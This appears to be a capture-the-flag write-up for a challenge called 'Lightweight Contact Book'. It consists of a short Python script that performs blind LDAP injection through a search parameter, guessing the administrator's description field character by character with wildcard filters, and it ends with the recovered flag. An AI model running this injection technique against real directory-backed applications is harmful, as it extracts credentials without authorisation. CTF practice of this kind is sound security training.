Lightweight Contact Book
import requests
import string
import sys
pwchars = string.ascii_lowercase + string.ascii_uppercase + "_- "
template = "http://jh2i.com:50019/?search=administrator)(description="
password = ""
while True:
for c in pwchars:
r = requests.get(template + password + c + "*")
if "Administrator User" in r.text:
password += c
break
print(password + c)
sys.stdout.write("\033[F")Flag:flag{kids_please_sanitize_your_inputs}
Last updated
Was this helpful?